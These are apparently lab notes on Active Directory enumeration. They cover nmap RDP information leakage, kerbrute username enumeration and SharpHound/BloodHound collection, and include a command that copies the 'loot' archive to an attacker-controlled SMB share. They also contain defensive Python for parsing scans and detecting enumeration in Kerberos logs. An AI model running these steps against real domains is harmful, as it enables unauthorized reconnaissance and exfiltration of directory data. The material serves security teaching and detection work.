
Active Directory - Enumeration

Information gathering

Information gathering on services such as RDP reveals a good deal about an Active Directory host or domain: the RDP listener's NTLM challenge and TLS certificate alone give away the domain, the host name and the Windows build.

  • Target: THM-AD
  • Domain: spookysec.local
  • DNS entry: AttacktiveDirectory.spookysec.local

$ nmap -p 53,80,88,135,139,445,464,593,636,3268,3269,3389 -sV -sC -oN scan.vuln.nmap 10.10.169.152
[...]
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-02-13T17:33:50
|_Not valid after:  2022-08-15T17:33:50
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-02-14T18:27:20+00:00
|_ssl-date: 2022-02-14T18:27:30+00:00; -1s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
[...]
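As an added example (not part of the original notes), the following Python parses the `ssl-cert` and `rdp-ntlm-info` script blocks out of nmap's normal (`-oN`) output and summarises what the RDP endpoint discloses to an unauthenticated client: NetBIOS and DNS names of the domain and host, the Windows build, and whether the certificate's common name matches the advertised host name. The sample input is the scan output above; the build-number table and the header-detection heuristic (an unindented lowercase, hyphenated script name followed by a colon) are my own assumptions, not part of nmap.

```python
import re
from typing import Dict, Optional

# Sample input: the ssl-cert / rdp-ntlm-info block from the scan above, as nmap -oN prints it.
SAMPLE_NMAP_OUTPUT = """\
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-02-13T17:33:50
|_Not valid after:  2022-08-15T17:33:50
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-02-14T18:27:20+00:00
|_ssl-date: 2022-02-14T18:27:30+00:00; -1s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# NSE script output lines start with "|" ("|_" on the last line of a block).
SCRIPT_LINE = re.compile(r"^\|_?\s?(?P<body>.*)$")
# Heuristic (assumption): a block header is an unindented lowercase, hyphenated
# script name followed by a colon, e.g. "ssl-cert: ..." or "rdp-ntlm-info:".
HEADER = re.compile(r"^(?P<name>[a-z0-9][a-z0-9-]*):\s*(?P<rest>.*)$")

# Assumed mapping of the build reported in Product_Version to a Windows release.
WINDOWS_BUILDS = {
    "10.0.14393": "Windows Server 2016 / Windows 10 1607",
    "10.0.17763": "Windows Server 2019 / Windows 10 1809",
    "10.0.20348": "Windows Server 2022",
}


def parse_nse_blocks(text: str) -> Dict[str, Dict[str, str]]:
    """Return {script_name: {key: value}} for every NSE block in nmap -oN output.

    "key: value" lines become entries; a header remainder that carries no such
    pair (ssl-date's timestamp, for instance) is stored under "_value".
    """
    blocks: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        m = SCRIPT_LINE.match(line)
        if not m:
            current = None  # left the script-output region of this port
            continue
        body = m.group("body")
        header = HEADER.match(body) if not body[:1].isspace() else None
        if header:
            current = header.group("name")
            blocks[current] = {}
            body = header.group("rest")
        body = body.strip()
        if current is None or not body:
            continue
        key, sep, value = body.partition(": ")
        if sep:
            blocks[current][key.strip()] = value.strip()
        else:
            blocks[current]["_value"] = body
    return blocks


def rdp_summary(blocks: Dict[str, Dict[str, str]]) -> Dict[str, object]:
    """Summarise what the RDP listener discloses and cross-check the TLS certificate."""
    ntlm = blocks.get("rdp-ntlm-info", {})
    cert = blocks.get("ssl-cert", {})
    # nmap prints the subject as "/"-separated attribute=value pairs; pick the CN.
    cn = ""
    for part in cert.get("Subject", "").split("/"):
        if part.startswith("commonName="):
            cn = part[len("commonName="):]
    host = ntlm.get("DNS_Computer_Name", "")
    version = ntlm.get("Product_Version", "")
    return {
        "domain_dns": ntlm.get("DNS_Domain_Name", ""),
        "domain_netbios": ntlm.get("NetBIOS_Domain_Name", ""),
        "host_dns": host,
        "host_netbios": ntlm.get("NetBIOS_Computer_Name", ""),
        "windows_build": WINDOWS_BUILDS.get(version, f"unknown build {version or '?'}"),
        "cert_cn": cn,
        # A self-issued RDP certificate normally carries the host's own FQDN as CN.
        "cert_matches_host": bool(cn) and cn.lower() == host.lower(),
    }


if __name__ == "__main__":
    for key, val in rdp_summary(parse_nse_blocks(SAMPLE_NMAP_OUTPUT)).items():
        print(f"{key:18} {val}")
```

Two details worth noticing in the output: `NetBIOS_Computer_Name` is `ATTACKTIVEDIREC` because NetBIOS names are limited to 15 characters, so the DNS name is the one to trust for inventory; and the certificate CN equalling `DNS_Computer_Name` is the normal self-issued RDP certificate, so a mismatch on a production host is worth a look.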

User enumeration

$ kerbrute userenum --dc 10.10.169.152 -d spookysec.local userlist.txt
[...]
2022/02/14 19:37:15 >  Using KDC(s):
2022/02/14 19:37:15 >   10.10.169.152:88

2022/02/14 19:37:16 >  [+] VALID USERNAME:       james@spookysec.local
2022/02/14 19:37:17 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2022/02/14 19:37:19 >  [+] VALID USERNAME:       James@spookysec.local
2022/02/14 19:37:20 >  [+] VALID USERNAME:       robin@spookysec.local
2022/02/14 19:37:28 >  [+] VALID USERNAME:       darkstar@spookysec.local
2022/02/14 19:37:33 >  [+] VALID USERNAME:       administrator@spookysec.local
[...]
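kerbrute's `userenum` sends a TGT request (AS-REQ) for every candidate name, and the KDC answers differently depending on whether the principal exists. On the domain controller the names that do not exist show up as Event ID 4768 records with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), one per guessed name. The following Python is an added detection example, not part of the original notes: it reads constructed 4768 records in a flat key=value export (an assumed format, not Windows' or any SIEM's own) and flags every client address that triggered 0x6 for many distinct usernames inside a short window, which separates a wordlist run from a user who mistypes their own name.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample of Security-log records (Event ID 4768, "A Kerberos authentication
# ticket (TGT) was requested"), flattened to one key=value line each (an assumed export
# format, not Windows' own). Status 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN: no such principal.
# 10.0.5.40 is a user retrying one typo; 10.0.9.77 walks a wordlist (constructed IPs).
SAMPLE_4768_EVENTS = """\
2022-02-14T19:37:15Z EventID=4768 TargetUserName=administrator IpAddress=10.0.5.21 Status=0x0
2022-02-14T19:37:15Z EventID=4768 TargetUserName=jmaes IpAddress=10.0.5.40 Status=0x6
2022-02-14T19:37:18Z EventID=4768 TargetUserName=james IpAddress=10.0.5.40 Status=0x0
2022-02-14T19:37:20Z EventID=4768 TargetUserName=aaron IpAddress=10.0.9.77 Status=0x6
2022-02-14T19:37:20Z EventID=4768 TargetUserName=abby IpAddress=10.0.9.77 Status=0x6
2022-02-14T19:37:21Z EventID=4768 TargetUserName=abby IpAddress=10.0.9.77 Status=0x6
2022-02-14T19:37:21Z EventID=4768 TargetUserName=adam IpAddress=10.0.9.77 Status=0x6
2022-02-14T19:37:22Z EventID=4768 TargetUserName=alex IpAddress=10.0.9.77 Status=0x6
2022-02-14T19:37:22Z EventID=4768 TargetUserName=alice IpAddress=10.0.9.77 Status=0x6
2022-02-14T19:37:24Z EventID=4768 TargetUserName=amy IpAddress=10.0.9.77 Status=0x6
2022-02-14T19:45:02Z EventID=4768 TargetUserName=zed IpAddress=10.0.9.77 Status=0x6
"""

KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6


def parse_events(text: str) -> List[Dict[str, object]]:
    """Parse the flat export into dicts, with the timestamp as a datetime under "time"."""
    events: List[Dict[str, object]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, *fields = line.split()
        ev: Dict[str, object] = {"time": datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")}
        for field in fields:
            key, _, value = field.partition("=")
            ev[key] = value
        events.append(ev)
    return events


def detect_user_enumeration(events: List[Dict[str, object]],
                            window: timedelta = timedelta(seconds=60),
                            threshold: int = 5) -> Dict[str, int]:
    """Return {client_ip: distinct_unknown_names} for every source that requested TGTs
    for at least `threshold` different non-existent principals within `window`.

    Counting distinct names rather than events keeps one user retrying a single
    typo below the threshold while a wordlist run still crosses it quickly.
    """
    failures: Dict[str, List[tuple]] = defaultdict(list)
    for ev in events:
        status = int(str(ev.get("Status", "0x0")), 16)
        if ev.get("EventID") == "4768" and status == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            failures[str(ev["IpAddress"])].append((ev["time"], str(ev["TargetUserName"]).lower()))

    alerts: Dict[str, int] = {}
    for ip, hits in failures.items():
        hits.sort()
        peak, start = 0, 0
        for end in range(len(hits)):
            # slide the window start forward until it spans at most `window` of time
            while hits[end][0] - hits[start][0] > window:
                start += 1
            peak = max(peak, len({name for _, name in hits[start:end + 1]}))
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


if __name__ == "__main__":
    for ip, count in detect_user_enumeration(parse_events(SAMPLE_4768_EVENTS)).items():
        print(f"possible username enumeration from {ip}: {count} unknown principals in 60s")
```

4768 events are only written when "Audit Kerberos Authentication Service" (Account Logon) is enabled on the domain controllers, so check that first; then tune `window` and `threshold` against a week of your own logs before alerting on the result.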

BloodHound

BloodHound builds a graph of an Active Directory domain so that exploitable misconfigurations in it can be found quickly.

Get started

  1. Download SharpHound onto the target host.
  2. Using the PowerShell version:
    1. Load SharpHound (dot-source the script so that Invoke-BloodHound is defined in the current session): . .\SharpHound.ps1
    2. Start the SharpHound collection: Invoke-BloodHound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
  3. Using the executable version:
    1. Start the SharpHound collection: .\SharpHound.exe -d CONTROLLER.local --zipfilename loot.zip
  4. Copy the resulting archive to your attacker machine: copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
  5. Run a neo4j server: sudo docker run --rm -p 7474:7474 -p 7687:7687 -e NEO4J_AUTH=neo4j/toto -v /tmp/neo4j/data:/data neo4j
  6. Run BloodHound: download a release, execute ./BloodHound-linux-x64/BloodHound and log in with:
    • Host: bolt://localhost:7687
    • Username: neo4j
    • Password: toto
  7. Drag and drop loot.zip into BloodHound.

You can run the pre-defined queries by clicking the burger menu icon, then Analysis, then the query you want to execute.
